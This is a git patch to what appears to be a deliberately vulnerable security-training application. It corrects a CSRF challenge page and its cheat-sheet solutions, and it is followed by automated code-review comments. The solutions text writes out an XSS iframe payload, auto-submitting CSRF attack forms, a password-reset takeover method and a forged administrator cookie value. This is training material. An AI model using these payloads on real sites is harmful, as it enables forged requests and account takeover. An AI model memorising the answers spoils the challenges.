From 8ce592b208a824689755bca1111d7b8b51f9c6c8 Mon Sep 17 00:00:00 2001 From: ismisepaul Date: Sat, 16 Apr 2022 21:18:40 +0100 Subject: [PATCH] fixing csrf challenge 2 where id was not displayed and cheat had a typo --- src/main/resources/i18n/cheatsheets/solutions.properties | 2 +- ...98a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/resources/i18n/cheatsheets/solutions.properties b/src/main/resources/i18n/cheatsheets/solutions.properties index d9f13ff03..e068da23a 100644 --- a/src/main/resources/i18n/cheatsheets/solutions.properties +++ b/src/main/resources/i18n/cheatsheets/solutions.properties @@ -2,7 +2,7 @@ 453d22238401e0bf6f1ff5d45996407e98e45b07.solution = To complete the lesson, the attack string is the following:
"https://hostname:port/root/grantComplete/csrfLesson?userId=tempId" cd7f70faed73d2457219b951e714ebe5775515d8.solution = Input is being filtered. To complete this challenge, enter the following attack string:
<iframe src='#' onload='alert("XSS")'></iframe> 2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution = The user Ids in this challenge follow a sequence 1,3,5 etc. The Hidden Users ID is 11 -94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution = To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge

<html>
<body>
<form id="completeChallenge2" action="https://hostname:port/user/csrfchallengetwo/plusplus" method="POST" >
<input type="hidden" name="userid" value="exampleId" />
<input type="submit"/>
</form>
<script>
document.forms["completeChallenge2"].submit();
</script>
</body>
</html>

The class form function should be used to create an iframe that forces the user to visit this attack page. +94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution = To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge

<html>
<body>
<form id="completeChallenge2" action="https://hostname:port/user/csrfchallengetwo/plusplus" method="POST" >
<input type="hidden" name="userId" value="exampleId" />
<input type="submit"/>
</form>
<script>
document.forms["completeChallenge2"].submit();
</script>
</body>
</html>

The class form function should be used to create an iframe that forces the user to visit this attack page. b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution = Use the login function with usernames like admin, administrator, root, etc to find administrator email accounts. Use the forgotten password functionality to change the password for the email address recovered. Inspect the response of the password reset request to see what the password was reset to. Use this password to login! a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution = Base 64 Decode the "checksum" cookie in the request to find it equals "userRole=user". Change the value of userRole to be administrator instead. The cookies new value should be "dXNlclJvbGU9YWRtaW5pc3RyYXRvcg==" when you replace it. 5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution = To complete this challenge, you must force an admin to submit a post request. The easiest way to achieve this is to force the admin to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge

<html>
<body>
<form id="completeChallenge3" action="https://hostname:port/user/csrfchallengethree/plusplus" method="POST" >
<input type="hidden" name="userid" value="exampleId" />
<input type="hidden" name="csrfToken" value="anythingExceptNull" />
<input type="submit"/>
</form>
<script>
document.forms["completeChallenge3"].submit();
</script>
</body>
</html>

The class form function should be used to create an iframe that forces the admin to visit this attack page. diff --git a/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp b/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp index b555566e1..4b43dac6c 100644 --- a/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp +++ b/src/main/webapp/challenges/z311736498a13604705d608fb3171ebf49bc18753b0ec34b8dff5e4f9147eb5e.jsp @@ -84,7 +84,7 @@ <%= bundle.getString("challenge.intro") %>

POST /user/csrfchallengetwo/plusplus
<%= bundle.getString("challenge.withThisParameter") %> - userId = <%= bundle.getString("challenge.userIdExample") %>
+ userId = <%= userId %>

<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %> <%= bundle.getString("challenge.userIdExample") %> <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>
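Review bot: the `name="userid"` → `name="userId"` correction in the csrfchallengetwo example form is not applied to the csrfchallengethree example form a few lines further down in the unchanged context (`<input type="hidden" name="userid" value="exampleId" />` under `action="https://hostname:port/user/csrfchallengethree/plusplus"`). If that endpoint reads the parameter as `userId` as well, the cheat sheet for challenge three has the same defect and should be fixed in this commit; if the parameter name genuinely differs between the two challenges, a line in the commit message saying so would stop the next contributor from "fixing" it. The solutions file is also edited as one very long property value, so please diff it with whitespace changes visible to confirm that only the single `userid` → `userId` change was introduced.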
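Review bot: `<%= userId %>` writes a variable straight into the response with no output encoding, and its declaration is outside the hunk, so it is not visible where the value comes from or whether it is in scope at this point in the JSP. If `userId` is a server-assigned value read from the session it is fine as written, but if it can be influenced by the client it should go through `fn:escapeXml` or `<c:out>` (or whatever encoder the project already uses) to avoid reflecting attacker-controlled text on a challenge page; either way, please confirm the variable is defined above this line, since an undefined scriptlet variable fails JSP compilation rather than showing up in a unit test. Separately, the unchanged context line that follows still prints `bundle.getString("challenge.userIdExample")` inside the "where the id is the user being incremented" sentence, so after this change the parameter line shows the user's real id while the explanatory sentence still shows the example id; that line should use `<%= userId %>` as well, or the bundle string should be reworded to refer to the id displayed above.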